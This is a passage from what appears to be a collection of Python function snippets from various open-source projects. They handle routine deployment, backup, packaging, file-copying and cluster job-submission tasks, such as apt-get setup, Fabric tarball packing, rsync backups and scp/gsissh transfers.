print(\"Error making directory %s\" % (tmp_dir))\n\n # refer to the label and create utt2spk, wav.scp\n f_utt2spk = open(utt2spk_path, 'w')\n f_wavscp = open(wavscp_path, 'w')\n f_label = open(args.label_file, 'r')\n for line in f_label:\n items = line.strip().split(' ')\n wav_file_path = os.path.join(args.wav_dir, items[0] + '.wav')\n if os.path.isfile(wav_file_path):\n f_utt2spk.write(items[1] + '_' + line)\n f_wavscp.write(items[1] + '_' + items[0] + ' ' + wav_file_path + '\\n')\n else:\n raise FileExistsError(\"wav file does not exist: %s\" % wav_file_path)\n f_label.close()\n f_utt2spk.close()\n f_wavscp.close()", "def do_base_setup(run_as_user, branch, base_path, dist_path):\n #install some necessary base deps\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install git-core software-properties-common python-software-properties build-essential ssl-cert\")\n runcmd(\"apt-get update\")\n #node-gyp building for insight has ...issues out of the box on Ubuntu... use Chris Lea's nodejs build instead, which is newer\n runcmd(\"apt-get -y remove nodejs npm gyp\")\n runcmd(\"add-apt-repository -y ppa:chris-lea/node.js\")\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install nodejs\") #includes npm\n\n #Create xcp user (to run bitcoind, counterpartyd, counterblockd) if not already made\n try:\n pwd.getpwnam(USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/bash --group %s\" % USERNAME)\n \n #add the run_as_user to the xcp group\n runcmd(\"adduser %s %s\" % (run_as_user, USERNAME))\n \n #Check out counterpartyd-build repo under this user's home dir and use that for the build\n git_repo_clone(branch, \"counterpartyd_build\", \"https://github.com/CounterpartyXCP/counterpartyd_build.git\", run_as_user)", "def main():\n # Initialize logging to the terminal and system log.\n coloredlogs.install(syslog=True)\n # Parse the command line arguments.\n context_opts = dict()\n program_opts = dict()\n dest_opts = dict()\n try:\n options, arguments = getopt.gnu_getopt(sys.argv[1:], 'bsrm:c:t:i:unx:fvqh', [\n 'backup', 'snapshot', 'rotate', 'mount=', 'crypto=', 'tunnel=',\n 'ionice=', 'no-sudo', 'dry-run', 'multi-fs', 'exclude=', 'force',\n 'disable-notifications', 'verbose', 'quiet', 'help',\n ])\n for option, value in options:\n if option in ('-b', '--backup'):\n enable_explicit_action(program_opts, 'backup_enabled')\n elif option in ('-s', '--snapshot'):\n enable_explicit_action(program_opts, 'snapshot_enabled')\n elif option in ('-r', '--rotate'):\n enable_explicit_action(program_opts, 'rotate_enabled')\n elif option in ('-m', '--mount'):\n program_opts['mount_point'] = value\n elif option in ('-c', '--crypto'):\n program_opts['crypto_device'] = value\n elif option in ('-t', '--tunnel'):\n ssh_user, _, value = value.rpartition('@')\n ssh_alias, _, port_number = value.partition(':')\n tunnel_opts = dict(\n ssh_alias=ssh_alias,\n ssh_user=ssh_user,\n # The port number of the rsync daemon.\n remote_port=RSYNCD_PORT,\n )\n if port_number:\n # The port number of the SSH server.\n tunnel_opts['port'] = int(port_number)\n dest_opts['ssh_tunnel'] = SecureTunnel(**tunnel_opts)\n elif option in ('-i', '--ionice'):\n value = value.lower().strip()\n validate_ionice_class(value)\n program_opts['ionice'] = value\n elif option in ('-u', '--no-sudo'):\n program_opts['sudo_enabled'] = False\n elif option in ('-n', '--dry-run'):\n logger.info(\"Performing a dry run (because of %s option) ..\", option)\n program_opts['dry_run'] = True\n elif option in ('-f', '--force'):\n program_opts['force'] = True\n elif option in ('-x', '--exclude'):\n program_opts.setdefault('exclude_list', [])\n program_opts['exclude_list'].append(value)\n elif option == '--multi-fs':\n program_opts['multi_fs'] = True\n elif option == '--disable-notifications':\n program_opts['notifications_enabled'] = False\n elif option in ('-v', '--verbose'):\n coloredlogs.increase_verbosity()\n elif option in ('-q', '--quiet'):\n coloredlogs.decrease_verbosity()\n elif option in ('-h', '--help'):\n usage(__doc__)\n return\n else:\n raise Exception(\"Unhandled option! (programming error)\")\n if len(arguments) > 2:\n msg = \"Expected one or two positional arguments! (got %i)\"\n raise Exception(msg % len(arguments))\n if len(arguments) == 2:\n # Get the source from the first of two arguments.\n program_opts['source'] = arguments.pop(0)\n if arguments:\n # Get the destination from the second (or only) argument.\n dest_opts['expression'] = arguments[0]\n program_opts['destination'] = Destination(**dest_opts)\n elif not os.environ.get('RSYNC_MODULE_PATH'):\n # Show a usage message when no destination is given.\n usage(__doc__)\n return\n except Exception as e:\n warning(\"Error: %s\", e)\n sys.exit(1)\n try:\n # Inject the source context into the program options.\n program_opts['source_context'] = create_context(**context_opts)\n # Initialize the program with the command line\n # options and execute the requested action(s).\n RsyncSystemBackup(**program_opts).execute()\n except Exception as e:\n if isinstance(e, RsyncSystemBackupError):\n # Special handling when the backup disk isn't available.\n if isinstance(e, MissingBackupDiskError):\n # Check if we're connected to a terminal to decide whether the\n # error should be propagated or silenced, the idea being that\n # rsync-system-backup should keep quiet when it's being run\n # from cron and the backup disk isn't available.\n if not connected_to_terminal():\n logger.info(\"Skipping backup: %s\", e)\n sys.exit(0)\n # Known problems shouldn't produce\n # an intimidating traceback to users.\n logger.error(\"Aborting due to error: %s\", e)\n else:\n # Unhandled exceptions do get a traceback,\n # because it may help fix programming errors.\n logger.exception(\"Aborting due to unhandled exception!\")\n sys.exit(1)", "def do_pack():\n d = datetime.now()\n local(\"mkdir -p versions\")\n file_name = 'versions/web_static_{}{}{}{}{}{}.tgz\\\n'.format(d.year, d.month, d.day, d.hour, d.minute, d.second)\n status = local(\"tar -cvzf\" + file_name + \" ./web_static/\", capture=True)\n if status.succeeded:\n return file_name\n return None", "def do_base_setup(run_as_user, branch, base_path, dist_path):\n #change time to UTC\n runcmd(\"ln -sf /usr/share/zoneinfo/UTC /etc/localtime\")\n\n #install some necessary base deps\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install git-core software-properties-common python-software-properties build-essential ssl-cert ntp runit\")\n \n #install node-js\n #node-gyp building has ...issues out of the box on Ubuntu... use Chris Lea's nodejs build instead, which is newer\n runcmd(\"apt-get -y remove nodejs npm gyp\")\n runcmd(\"add-apt-repository -y ppa:chris-lea/node.js\")\n runcmd(\"apt-get update\")\n runcmd(\"apt-get -y install nodejs\") #includes npm\n gypdir = None\n try:\n import gyp\n gypdir = os.path.dirname(gyp.__file__)\n except:\n pass\n else:\n runcmd(\"mv %s %s_bkup\" % (gypdir, gypdir))\n #^ fix for https://github.com/TooTallNate/node-gyp/issues/363\n\n #Create xcp user, under which the files will be stored, and who will own the files, etc\n try:\n pwd.getpwnam(USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/false --group %s\" % USERNAME)\n \n #Create xcpd user (to run counterpartyd, counterblockd, insight, bitcoind, nginx) if not already made\n try:\n pwd.getpwnam(DAEMON_USERNAME)\n except:\n logging.info(\"Creating user '%s' ...\" % DAEMON_USERNAME)\n runcmd(\"adduser --system --disabled-password --shell /bin/false --ingroup nogroup --home %s %s\" % (USER_HOMEDIR, DAEMON_USERNAME))\n \n #add the run_as_user to the xcp group\n runcmd(\"adduser %s %s\" % (run_as_user, USERNAME))\n \n #Check out counterpartyd-build repo under this user's home dir and use that for the build\n git_repo_clone(\"counterpartyd_build\", \"https://github.com/CounterpartyXCP/counterpartyd_build.git\",\n os.path.join(USER_HOMEDIR, \"counterpartyd_build\"), branch, for_user=run_as_user)\n\n #enhance fd limits for the xcpd user\n runcmd(\"cp -af %s/linux/other/xcpd_security_limits.conf /etc/security/limits.d/\" % dist_path)", "def apply_dart(self):\n shutil.copyfile(self.env['DART_JS_BOOTSTRAP'], self.outdir.make_node('dart.js').abspath())\n for filetype in ['dartfiles','jsfiles','htmlfiles','cssfiles','otherfiles']:\n files = getattr(self, filetype)\n for f in files:\n if f.is_bld():\n outf = self.outdir.make_node(f.path_from(self.path.get_bld()))\n elif f.is_src():\n outf = self.outdir.make_node(f.path_from(self.path.get_src()))\n else:\n raise Exception(\"I don't know what I'm doing anymore.\")\n self.create_task('copytask',f,outf)", "def copy_local_code() -> co.Exec:\n image = co.Image(\"python:3.8-alpine\", copy_dir=\"./code\")\n return co.Exec(\"python test.py\", image=image, doc=co.util.magic_doc())", "def deploy_scripts():\n # Upload the boto config file\n put(\"scripts/.boto\", \".boto\")\n # Then upload the scripts\n local(\"tar -czf scripts.tar.gz scripts\")\n put(\"scripts.tar.gz\", \".\")\n run(\"tar zxf scripts.tar.gz\")\n run(\"rm scripts.tar.gz\")\n local(\"rm scripts.tar.gz\")", "def dumpf(self, gzip=False):\n if 0 != len(self.sources):\n os.mkdir(self.name)\n filename = os.path.join(self.name, 'bootstrap.sh')\n f = codecs.open(filename, 'w', encoding='utf-8')\n elif gzip:\n filename = '{0}.sh.gz'.format(self.name)\n f = gziplib.open(filename, 'w')\n else:\n filename = '{0}.sh'.format(self.name)\n f = codecs.open(filename, 'w', encoding='utf-8')\n f.write(self.comment)\n f.write('cd \"$(dirname \"$0\")\"\\n')\n for filename2, content in sorted(self.sources.iteritems()):\n f2 = open(os.path.join(self.name, filename2), 'w')\n f2.write(content)\n f2.close()\n for out in self.out:\n f.write(out)\n f.close()\n if gzip and 0 != len(self.sources):\n filename = 'sh-{0}.tar.gz'.format(self.name)\n tarball = tarfile.open(filename, 'w:gz')\n tarball.add(self.name)\n tarball.close()\n return filename\n return filename", "def _add_scripts(prefix):\n mapping = {\"MAST_HOME\": prefix}\n if \"Windows\" in platform.system():\n script_dir = os.path.join(INSTALL_DIR, \"files\", \"windows\")\n files = [\n \"mast.bat\",\n \"mast-system.bat\",\n \"mast-accounts.bat\",\n \"mast-backups.bat\",\n \"mast-crypto.bat\",\n \"mast-deployment.bat\",\n \"mast-developer.bat\",\n \"mast-network.bat\",\n \"test-mast.bat\",\n \"mast-version.bat\",\n \"mast-web.bat\",\n \"mastd.bat\",\n \"mast-ssh.bat\",\n \"set-env.bat\",\n ]\n elif \"Linux\" in platform.system():\n script_dir = os.path.join(INSTALL_DIR, \"files\", \"linux\")\n files = [\n \"mast\",\n \"mast-system\",\n \"mast-accounts\",\n \"mast-backups\",\n \"mast-crypto\",\n \"mast-deployment\",\n \"mast-developer\",\n \"mast-network\",\n \"test-mast\",\n \"mast-version\",\n \"mast-web\",\n \"mast-ssh\",\n \"mastd\",\n \"set-env\",\n ]\n\n for f in files:\n dst = os.path.join(prefix, f)\n src = os.path.join(script_dir, f)\n print(\"{} -> {}\".format(src, dst))\n content = render_template_file(src, mapping)\n write_file(dst, content)\n if \"Linux\" in platform.system():\n os.chmod(dst, 0o755)\n\n if \"Windows\" in platform.system():\n # copy python27.dll to site-packages/win32 directory to get around\n # issue when starting mastd\n src = os.path.join(prefix, \"miniconda\", \"python27.dll\")\n dst = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"win32\",\n \"python27.dll\"\n )\n copyfile(src, dst)\n for filename in [\"pythoncom27.dll\", \"pythoncomloader27.dll\", \"pywintypes27.dll\"]:\n src = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"pywin32_system32\",\n filename,\n )\n dst = os.path.join(\n prefix,\n \"miniconda\",\n \"Lib\",\n \"site-packages\",\n \"win32\",\n filename,\n )\n copyfile(src, dst)\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"bin\"),\n os.path.join(prefix, \"bin\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"etc\"),\n os.path.join(prefix, \"etc\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"var\"),\n os.path.join(prefix, \"var\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"usrbin\"),\n os.path.join(prefix, \"usrbin\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"tmp\"),\n os.path.join(prefix, \"tmp\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"doc\"),\n os.path.join(prefix, \"doc\")\n )\n copytree(\n os.path.join(INSTALL_DIR, \"files\", \"contrib\"),\n os.path.join(prefix, \"contrib\")\n )", "def main(base_dir: str, output_dir: str) -> None:\n base_path = pathlib.Path(base_dir)\n output_path = pathlib.Path(output_dir).expanduser()\n\n stage_copy_images(base_path, output_path)\n stage_extract_videos(base_path, output_path)", "def generate_all_files():\n for (name, fn) in lang_module.targets.items():\n path = of_g.options.install_dir + '/' + name\n os.system(\"mkdir -p %s\" % os.path.dirname(path))\n with open(path, \"w\") as outfile:\n fn(outfile, os.path.basename(name))\n print(\"Wrote contents for \" + name)", "def do_pack():\n\n sd = '{0:%Y%m%d%H%M%S}'.format(datetime.now())\n fname = 'versions/web_static_' + sd + '.tgz'\n local('mkdir -p versions')\n rs = local('tar -cvzf ' + fname + ' web_static')\n\n if rs.succeeded:\n return fname\n return None", "def main():\n # Initialize logging to the terminal and system log.\n coloredlogs.install(syslog=True)\n # Parse the command line arguments.\n context_opts = dict()\n program_opts = dict()\n dest_opts = dict()\n try:\n options, arguments = getopt.gnu_getopt(sys.argv[1:], 'bsrm:c:t:i:unx:fvqhVQp', [\n 'backup', 'snapshot', 'rotate', 'mount=', 'crypto=', 'tunnel=',\n 'ionice=', 'no-sudo', 'dry-run', 'exclude=', 'force',\n 'disable-notifications', 'verbose', 'quiet', 'help', 'multi-fs',\n 'rsync-verbose', 'rsync-quiet', 'rsync-progress'\n ])\n for option, value in options:\n if option in ('-b', '--backup'):\n enable_explicit_action(program_opts, 'backup_enabled')\n elif option in ('-s', '--snapshot'):\n enable_explicit_action(program_opts, 'snapshot_enabled')\n elif option in ('-r', '--rotate'):\n enable_explicit_action(program_opts, 'rotate_enabled')\n elif option in ('-m', '--mount'):\n program_opts['mount_point'] = value\n elif option in ('-c', '--crypto'):\n program_opts['crypto_device'] = value\n elif option in ('-t', '--tunnel'):\n ssh_user, _, value = value.rpartition('@')\n ssh_alias, _, port_number = value.partition(':')\n tunnel_opts = dict(\n ssh_alias=ssh_alias,\n ssh_user=ssh_user,\n # The port number of the rsync daemon.\n remote_port=RSYNCD_PORT,\n )\n if port_number:\n # The port number of the SSH server.\n tunnel_opts['port'] = int(port_number)\n dest_opts['ssh_tunnel'] = SecureTunnel(**tunnel_opts)\n elif option in ('-i', '--ionice'):\n value = value.lower().strip()\n validate_ionice_class(value)\n program_opts['ionice'] = value\n elif option in ('-u', '--no-sudo'):\n program_opts['sudo_enabled'] = False\n elif option in ('-n', '--dry-run'):\n logger.info(\"Performing a dry run (because of %s option) ..\", option)\n program_opts['dry_run'] = True\n elif option in ('-f', '--force'):\n program_opts['force'] = True\n elif option in ('-x', '--exclude'):\n program_opts.setdefault('exclude_list', [])\n program_opts['exclude_list'].append(value)\n elif option == '--multi-fs':\n program_opts['multi_fs'] = True\n elif option == '--disable-notifications':\n program_opts['notifications_enabled'] = False\n elif option in ('-V', '--rsync-verbose'):\n if 'rsync_verbose_count' not in program_opts:\n program_opts['rsync_verbose_count'] = 1\n else:\n program_opts['rsync_verbose_count'] = program_opts['rsync_verbose_count'] + 1\n elif option in ('-Q', '--rsync-quiet'):\n if 'rsync_quiet_count' not in program_opts:\n program_opts['rsync_quiet_count'] = 1\n else:\n program_opts['rsync_quiet_count'] = program_opts['rsync_quiet_count'] + 1\n elif option in ('-v', '--verbose'):\n coloredlogs.increase_verbosity()\n elif option in ('-q', '--quiet'):\n coloredlogs.decrease_verbosity()\n elif option in ('-p', '--rsync-progress'):\n program_opts['rsync_show_progress'] = True\n elif option in ('-h', '--help'):\n usage(__doc__)\n return\n else:\n raise Exception(\"Unhandled option! (programming error)\")\n if len(arguments) > 2:\n msg = \"Expected one or two positional arguments! (got %i)\"\n raise Exception(msg % len(arguments))\n if len(arguments) == 2:\n # Get the source from the first of two arguments.\n program_opts['source'] = arguments.pop(0)\n if arguments:\n # Get the destination from the second (or only) argument.\n dest_opts['expression'] = arguments[0]\n program_opts['destination'] = Destination(**dest_opts)\n elif not os.environ.get('RSYNC_MODULE_PATH'):\n # Show a usage message when no destination is given.\n usage(__doc__)\n return\n except Exception as e:\n warning(\"Error: %s\", e)\n sys.exit(1)\n try:\n # Inject the source context into the program options.\n program_opts['source_context'] = create_context(**context_opts)\n # Initialize the program with the command line\n # options and execute the requested action(s).\n RsyncSystemBackup(**program_opts).execute()\n except Exception as e:\n if isinstance(e, RsyncSystemBackupError):\n # Special handling when the backup disk isn't available.\n if isinstance(e, MissingBackupDiskError):\n # Check if we're connected to a terminal to decide whether the\n # error should be propagated or silenced, the idea being that\n # rsync-system-backup should keep quiet when it's being run\n # from cron and the backup disk isn't available.\n if not connected_to_terminal():\n logger.info(\"Skipping backup: %s\", e)\n sys.exit(0)\n # Known problems shouldn't produce\n # an intimidating traceback to users.\n logger.error(\"Aborting due to error: %s\", e)\n else:\n # Unhandled exceptions do get a traceback,\n # because it may help fix programming errors.\n logger.exception(\"Aborting due to unhandled exception!\")\n sys.exit(1)", "def convert_placards():\n\n local('cd import_scripts;../bin/python import_placards.py import')", "def packFiles(source, filesPerBlock, dest):\n\tfileCount = 1\n\t\n\ttmpFileName = \"tmp.h5\"\t\n\n\n\toutFile = createBlockFile(tmpFileName)\t\n\tfor dirname, subdirs, files in os.walk(source):\t\n\t print 'Scanning ' + dirname + '...'\t\n\t for f in files:\t\n\t if f.endswith('.h5'):\t\n\t inFile = h5py.File(os.path.join(dirname, f), 'r')\t\n\t outFile.copy(inFile, outFile['songs'], f)\t\n\t inFile.close()\t\n\t fileCount = fileCount + 1\t\n\t if(fileCount > filesPerBlock):\t\n\t outFile.close()\t\n\t upload(tmpFileName, bucket)\t\n\t fileCount = 1\t\n\t outFile = createBlockFile(tmpFileName)\t\n\n \toutFile.close()\n \tif fileCount > 1:\n\t \tupload(tmpFileName, bucket)\n\n\tos.remove(tmpFileName)", "def run(env: Environment):\n\n package_directory = env.args.get('package_directory') or '.'\n output_directory = env.args.get('output_directory')\n\n directory = os.path.realpath(package_directory)\n if not os.path.exists(directory):\n raise NotADirectoryError('No such directory \"{}\"'.format(directory))\n\n save_directory = (\n os.path.realpath(output_directory)\n if output_directory else\n directory\n )\n\n bundle_directory = tempfile.mkdtemp(prefix='pipper-bundle-')\n\n try:\n print('[COMPILE]: Creating universal wheel')\n distribution_data = create_wheel(directory, bundle_directory)\n print('[COLLECT]: Creating package metadata')\n create_meta(directory, bundle_directory, distribution_data)\n print('[ASSEMBLE]: Creating pipper package bundle')\n path = zip_bundle(bundle_directory, save_directory, distribution_data)\n print('[BUNDLED]:', path)\n except Exception:\n raise\n finally:\n shutil.rmtree(bundle_directory)", "def do_pack():\n files = 'versions/web_static_{}{}{}{}{}{}.tgz'\\\n .format(T.year, T.month, T.day, T.hour, T.minute, T.second)\n local('mkdir -p versions')\n execute = local(\"tar -cvzf \" + files + \" ./web_static/\")\n if execute.succeeded:\n return files\n return None", "def _copy_otto_files(self):\n\n # Copy files used by the container\n # Substitute name of the container in the configuration file.\n lxcdefaults = os.path.join(utils.get_base_dir(), \"lxc.defaults\")\n with open(os.path.join(lxcdefaults, \"config\"), 'r') as fin:\n with open(os.path.join(self.containerpath, \"config\"), 'w') as fout:\n for line in fin:\n lineout = line\n if \"${NAME}\" in line:\n lineout = line.replace(\"${NAME}\", self.name)\n elif \"${ARCH}\" in line:\n lineout = line.replace(\"${ARCH}\", self.arch)\n fout.write(lineout)\n\n dri_exists = os.path.exists(\"/dev/dri\")\n vga_device = utils.find_vga_device()\n with open(os.path.join(lxcdefaults, \"fstab\"), 'r') as fin:\n with open(os.path.join(self.containerpath, \"fstab\"), 'w') as fout:\n for line in fin:\n if line.startswith(\"/dev/dri\") and not dri_exists:\n lineout = \"# /dev/dri not found, entry disabled (\"\\\n \"do you use nvidia or fglrx graphics \"\\\n \"drivers?)\\n\"\n lineout += \"#\" + line\n else:\n lineout = line\n fout.write(lineout)\n\n src = os.path.join(lxcdefaults, \"scripts\")\n dst = os.path.join(self.containerpath, \"tools\", \"scripts\")\n with ignored(OSError):\n shutil.rmtree(dst)\n shutil.copytree(src, dst)\n utils.set_executable(os.path.join(dst, \"pre-start.sh\"))\n utils.set_executable(os.path.join(dst, \"pre-mount.sh\"))\n utils.set_executable(os.path.join(dst, \"post-stop.sh\"))\n\n src = os.path.join(lxcdefaults, \"guest\")\n dst = os.path.join(self.containerpath, \"tools\", \"guest\")\n with ignored(OSError):\n shutil.rmtree(dst)\n shutil.copytree(src, dst)\n\n # Some graphics need a proprietary driver\n # driver -> packages to install\n drivers = {\n \"fglrx\": \"fglrx\",\n \"fglrx_pci\": \"fglrx\",\n \"nvidia\": \"nvidia-current\"\n }\n if vga_device is not None and \"Driver\" in vga_device:\n if vga_device[\"Driver\"] in drivers:\n logging.info(\"Installing additional drivers for graphics \"\n \"card {}\".format(vga_device[\"Device\"]))\n # l-h-g must be installed to compile additional modules\n pkgs = \"linux-headers-generic {}\\n\".format(\n drivers[vga_device[\"Driver\"]])\n # TODO: this shouldn't be in the guest directory\n pkgsdir = os.path.join(self.containerpath, \"tools\", \"guest\", \"var\", \"local\", \"otto\", \"config\")\n if not os.path.exists(pkgsdir):\n os.makedirs(pkgsdir)\n with open(os.path.join(pkgsdir, \"00drivers.pkgs\"), 'w') as fpkgs:\n logging.debug(\"Custom drivers written to {}\".format(\n os.path.join(pkgsdir, \"00drivers.pkgs\")))\n fpkgs.write(pkgs)", "def main():\n # This have specific paths to prevent abitrary binaries from being\n # executed. The \"gsi\"* utilities are configured to use either grid proxies\n # or ssh, automatically.\n remoteLoginCmd = \"/usr/bin/gsissh\"\n remoteCopyCmd = \"/usr/bin/gsiscp\"\n\n UNKNOWN_PLATFORM_EXIT_CODE = 10\n MISSING_PBS_CONFIG_EXIT_CODE = 20\n\n p = AllocatorParser(sys.argv[0])\n platform = p.getPlatform()\n\n creator = Allocator(platform, p.getArgs(), \"$HOME/.lsst/condor-info.py\")\n\n platformPkgDir = lsst.utils.getPackageDir(\"ctrl_platform_\"+platform)\n configName = os.path.join(platformPkgDir, \"etc\", \"config\", \"pbsConfig.py\")\n execConfigName = os.path.join(platformPkgDir, \"etc\", \"config\", \"execConfig.py\")\n\n creator.load(execConfigName)\n\n creator.loadPbs(configName)\n\n verbose = creator.isVerbose()\n \n pbsName = os.path.join(platformPkgDir, \"etc\", \"templates\", \"generic.pbs.template\")\n generatedPbsFile = creator.createPbsFile(pbsName)\n\n condorFile = os.path.join(platformPkgDir, \"etc\", \"templates\", \"glidein_condor_config.template\")\n generatedCondorConfigFile = creator.createCondorConfigFile(condorFile)\n\n scratchDirParam = creator.getScratchDirectory()\n template = Template(scratchDirParam)\n scratchDir = template.substitute(USER_HOME=creator.getUserHome())\n userName = creator.getUserName()\n \n hostName = creator.getHostName()\n\n utilityPath = creator.getUtilityPath()\n\n #\n # execute copy of PBS file to XSEDE node\n #\n cmd = \"%s %s %s@%s:%s/%s\" % (remoteCopyCmd, generatedPbsFile, userName, hostName, scratchDir, os.path.basename(generatedPbsFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteCopyCmd, hostName)\n sys.exit(exitCode)\n\n #\n # execute copy of Condor config file to XSEDE node\n #\n cmd = \"%s %s %s@%s:%s/%s\" % (remoteCopyCmd, generatedCondorConfigFile, userName, hostName, scratchDir, os.path.basename(generatedCondorConfigFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteCopyCmd, hostName)\n sys.exit(exitCode)\n\n #\n # execute qsub command on XSEDE node to perform Condor glide-in\n #\n cmd = \"%s %s@%s %s/qsub %s/%s\" % (remoteLoginCmd, userName, hostName, utilityPath, scratchDir, os.path.basename(generatedPbsFile))\n if verbose:\n print cmd\n exitCode = runCommand(cmd, verbose)\n if exitCode != 0:\n print \"error running %s to %s.\" % (remoteLoginCmd, hostName)\n sys.exit(exitCode)\n\n nodes = creator.getNodes()\n slots = creator.getSlots()\n wallClock = creator.getWallClock()\n nodeString = \"\"\n if int(nodes) > 1:\n nodeString = \"s\"\n print \"%s node%s will be allocated on %s with %s slots per node and maximum time limit of %s\" % (nodes, nodeString, platform, slots, wallClock)\n print \"Node set name:\"\n print creator.getNodeSetName()\n sys.exit(0)", "def compress():\n run_manage_cmd('compress_assets')", "def deploy():\n with cd(\"~/public_html/\"):\n run(\"/usr/local/cpanel/3rdparty/bin/git pull\")\n\n with cd(\"~/public_html/skin/frontend/gemz/default/tools/\"):\n run(\"grunt default\")\n #sudo(\"/scripts/enablefileprotect\")", "def up(self, args):\n try:\n assert len(args) > 0\n path = args[0]\n compress = should('Compress file?')\n self.prepare_upload(path, compress)\n except AssertionError:\n print(\"I need a file name!\")", "def main(opts):\n\n if arguments['--generate-pigz']:\n gen_pigz_thread_helper()\n sys.exit(0)\n\n if arguments['--full']:\n cmd, cmd_hide, backup_path, backup_base, top_backup_base = build_full(arguments)\n clean.clean_backups(top_backup_base, int(arguments['--keep']), False)\n check_space(top_backup_base)\n succ = run_backup(cmd, cmd_hide)\n print('Backup ended {0}'.format(('Error', 'Successfully')[succ]))\n if not succ: raise BackupErrorBackupFailed('Backup', backup_path)\n if succ and not opts['--no-prepare']:\n cmd = build_full_prepare(opts, backup_path)\n succ = run_backup(cmd, cmd_hide)\n print('Prepare ended {0}'.format(('Error', 'Successfully')[succ]))\n if not succ: raise BackupErrorBackupFailed('Prepare', backup_path)\n if succ and (opts['--compress'] or int(opts['--compress-threads'])>0):\n threads = check_pigz_treads(opts['--compress-threads'])\n tar_file = tar_dir(backup_path, threads, check=not opts['--no-check'])\n if opts['--enc']:\n encrypt(tar_file, config.pass_phrase)\n elif arguments['--inc']:\n build_inc(arguments)", "def main():\n file_one_path, file_two_path, output_path =\\\n get_command_line_arguments(\n ['/home/ehler002/project/groups/go/Data/Cluster_Data/Dataset.txt',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/translated_genes.fpkm_table',\n '/home/ehler002/project/groups/go/Data/Cluster_Data/Full_fpkm_Table.txt'])\n pattern = 'CRO_T'\n for file_path in [file_one_path, file_two_path]:\n assert os.path.exists(file_path), 'File %s does not exist.' % file_path\n start_time = datetime.datetime.now()\n print('Started concatenation at %s' % start_time)\n file_contents, headers = get_file_contents(file_two_path)\n file_contents = sort_file_contents(file_contents)\n file_contents = remove_pattern(file_contents, pattern)\n concatenate_files(file_one_path, file_contents, headers, output_path)\n print('Finished concatenation in %s' % (datetime.datetime.now() - start_time))", "def copyClusterFileToIntel(fileOnCluster,pathOnLinux):\n\tcommand = 'scp amennen@apps.pni.princeton.edu:{0} {1} '.format(fileOnCluster,pathOnLinux)\n\tcall(command,shell=True)\n\t#return command", "def main():\n with open('config.json') as config_file:\n configs = json.load(config_file)\n\n jar_list = utilities.upload_jars(configs)\n utilities.sign_jars(configs)\n\n artifact_folder = utilities.prepare_artifacts(configs, jar_list)\n\n repo_id = utilities.create_staging_repo(configs)\n utilities.deploy_to_staging_repo(configs, artifact_folder, repo_id)\n utilities.close_staging_repo(configs, repo_id)", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\\\n\".format(a.year if a.year > 999 else \"0\" + str(a.year),\n a.month if a.month > 9 else \"0\" + str(a.month),\n a.day if a.day > 9 else \"0\" + str(a.day),\n a.hour if a.hour > 9 else \"0\" + str(a.hour),\n a.minute if a.minute > 9 else \"0\" + str(a.minute),\n a.second if a.second > 9 else \"0\" + str(a.second))\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def compress_files(time_stamp, files_to_be_appended):\n process = subprocess.run([\"tar\", \"-czf\", f\"connect-log.{time_stamp}.tar.gz\", files_to_be_appended[0],\n files_to_be_appended[1],\n files_to_be_appended[2],\n files_to_be_appended[3], files_to_be_appended[4]], capture_output=True)", "def allocation_script_for_resource(allocation_name, output_path):\n\n vc3_client = get_vc3_client()\n allocation = vc3_client.getAllocation(allocation_name)\n pubkey = vc3_client.decode(allocation.pubtoken)\n dir_name = os.path.dirname(output_path)\n\n try:\n os.makedirs(dir_name, 0755)\n except OSError as e:\n if e.errno == errno.EEXIST:\n pass\n else:\n raise\n\n with open(output_path, 'w+b') as fh:\n script = \"\"\"#! /bin/sh\n\nPUBKEY=\"{}\"\nAUTHFILE=~/.ssh/authorized_keys\n\nif [ ! -d ~/.ssh ]\nthen\n /bin/echo -n \"Creating ~/.ssh directory... \"\n if mkdir -m 0700 -p ~/.ssh\n then\n echo \"done\"\n else\n echo \"error\"\n exit 1\n fi\nfi\n\nif [ ! -f $AUTHFILE ]\nthen\n /bin/echo -n \"Creating $AUTHFILE file... \"\n if (umask 177; touch $AUTHFILE)\n then\n echo \"done\"\n else\n echo \"error\"\n exit 1\n fi\nfi\n\n/bin/echo -n \"Copying public key to $AUTHFILE file... \"\n\nif /bin/grep -q \"$PUBKEY\" $AUTHFILE\nthen\n echo \"key already in file.\"\nelif /bin/echo \"$PUBKEY\" >> $AUTHFILE\nthen\n echo \"done\"\nelse\n echo \"error\"\n exit 1\nfi\n\nexit 0\n\n\"\"\".format(pubkey)\n fh.write(script)", "def main():\n remote_folder = '/s3mnt/carla-rl/outputs'\n local_folder = '/home/jeremy/Insight/Project'\n dns = get_publicdns()\n\n print(\"fetching data from server...\")\n os.system('rsync=$(/home/jeremy/.scripts_custom/rsync_pull_aws \\\n ubuntu@{} {} {})'.format(dns, remote_folder,\n local_folder))\n print(\"pulled from {} to {}\".format(remote_folder,\n local_folder))", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\", type=str, nargs=\"+\")\n parser.add_argument(\"--user\", type=str, default=getpass.getuser())\n parser.add_argument(\"--path\", type=str, 